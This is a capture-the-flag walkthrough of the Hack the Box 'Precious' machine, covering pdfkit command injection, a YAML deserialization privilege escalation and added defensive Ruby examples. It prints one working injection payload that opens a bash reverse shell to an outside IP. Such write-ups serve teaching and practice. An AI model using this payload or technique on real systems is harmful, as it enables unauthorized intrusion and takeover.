In this post, I would like to share a walkthrough of the Precious Machine from Hack the Box
This room is rated as an Easy machine on Hack the Box.
What will you gain from the precious machine?
For the user flag, you will need to abuse the web service that converts a web page into a PDF file. It is vulnerable to command injection, which is how we obtain a shell.
As for the root flag, you need to take advantage of a YAML deserialization attack to obtain code execution.
Information Gathering on Precious Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
Let’s access the website interface
The webpage only shows the interface for converting a Web Page to a PDF file.
Therefore, let’s start our Python server on our attacker machine to monitor how the web page responds.
Let’s enter our IP Address and click the submit button
This is what it looks like when the service is pointed at our own IP address.
As a result, we can see the requests arriving on our Python server.
Finally, we can open the generated PDF file, shown above.
The PDF file is given a random name that has no meaning at all.
Let’s analyze the PDF file’s metadata and notice that the Creator field is “pdfkit v0.8.6”. The exploit summary can be found on the Snyk page.
The exploitation code looks something like the payload shown above:
http://darknite.com/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.14.10/443 0>&1"`'}
We can enter a reverse shell command there (bash as above, or a “python” one) to obtain the reverse shell connection.
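To make the defect concrete, here is an added example in Ruby (my own code, not code from the Precious box or from the pdfkit gem) of the kind of input validation and shell-free invocation that prevents this class of command injection: the URL is parsed, restricted to http/https, checked in its percent-decoded form for whitespace and shell metacharacters, and the renderer is invoked with an argv array instead of a shell string. The allow-list, the function names and the wkhtmltopdf arguments are my assumptions.

```ruby
require "uri"
require "cgi"

# Characters that should never survive into a URL handed to a PDF renderer.
# This allow-list is my own assumption, not pdfkit's code.
SHELL_META = /[\s`$;|&<>()'"\\]/

# Validate a user-supplied URL before it reaches the renderer.
# Returns a URI::HTTP / URI::HTTPS on success, nil if the input is rejected.
def safe_pdf_url(input)
  return nil unless input.is_a?(String) && input.length <= 2048
  uri = begin
    URI.parse(input)
  rescue URI::InvalidURIError
    return nil
  end
  # Only fetch over http(s); this rejects file://, javascript: and bare strings.
  return nil unless uri.is_a?(URI::HTTP) && uri.host
  # Check the decoded form as well: %20 hides a space that a shell would split on,
  # which is exactly how a payload like the one above slips past a naive check.
  return nil if CGI.unescape(input).match?(SHELL_META)
  uri
end

# Build the render command as an argv array. Passing separate arguments to
# Process.spawn / Open3 runs the program directly, so no shell ever
# interprets backticks or $(...) that might be embedded in the URL.
def render_argv(uri, output_path)
  ["wkhtmltopdf", "--quiet", uri.to_s, output_path]
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs: one benign, one carrying the encoded-space trick.
  ["https://example.com/page?id=1", 'http://example.com/?name=%20`hostname`'].each do |candidate|
    uri = safe_pdf_url(candidate)
    puts "#{candidate.inspect} -> #{uri ? render_argv(uri, '/tmp/out.pdf').inspect : 'rejected'}"
  end
end
```

The two checks are complementary: the argv array removes the shell from the path entirely, and the decoded-form check still rejects inputs that would be suspicious even for a renderer that never touches a shell.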
Boom! We managed to retrieve a reverse shell connection back to us.
We managed to find some credentials for henry, which we can take advantage of for user escalation.
Finally, we managed to obtain the reverse shell connection back to us as shown above.
We can read the user flag by running the command “cat user.txt”
Escalate to Root Privileges Access
Aside from the user.txt file, we also spotted a dependencies.yml file saved in the same directory for some reason.
As usual, we check for any SUID binary that we can abuse to obtain root privileges.
Let’s read the SUID binary and notice that it uses a file.read function on the dependencies.yml file.
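As an added defensive counterpart to the YAML deserialization step (my own Ruby, not the code of the box’s SUID binary), this shows how a loader that reads a dependencies.yml with YAML.safe_load refuses a tagged !ruby/object document instead of instantiating the class, which is what older Psych versions do for a plain YAML.load. The file layout and the class name in the hostile sample are constructed placeholders.

```ruby
require "yaml"

# Constructed sample in the shape of a dependencies.yml (the layout is my
# assumption, not the file from the box).
DEPENDENCIES_YAML = <<~YAML
  dependencies:
    pdfkit: 0.8.6
    sinatra: 2.2.0
YAML

# Constructed hostile document: a tagged object that asks the loader to
# instantiate an arbitrary class. The class name is a placeholder.
TAGGED_YAML = <<~YAML
  --- !ruby/object:SomeApplicationClass
  setting: value
YAML

# Parse with safe_load: only scalars, arrays and hashes are built, and any
# !ruby/object tag raises Psych::DisallowedClass instead of instantiating.
def load_dependencies(text)
  YAML.safe_load(text, permitted_classes: [], aliases: false)
end

# Turn the exception into an explicit rejection, which is what a privileged
# program reading an attacker-writable file should do.
def dependencies_or_reject(text)
  [:ok, load_dependencies(text)]
rescue Psych::DisallowedClass, Psych::SyntaxError => e
  [:rejected, e.class.name]
end

if __FILE__ == $PROGRAM_NAME
  p dependencies_or_reject(DEPENDENCIES_YAML)
  p dependencies_or_reject(TAGGED_YAML)
end
```

A privileged binary that reads a file from a directory the low-privileged user controls has to assume that file is hostile, so the tagged document must be rejected rather than deserialized.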
Let’s execute the command on the victim’s machine
However, we notice that bash has been assigned the SUID bit.
We can execute bash -p to escalate to root access.
At last, I can read the root flag by running the command “cat /root/root.txt”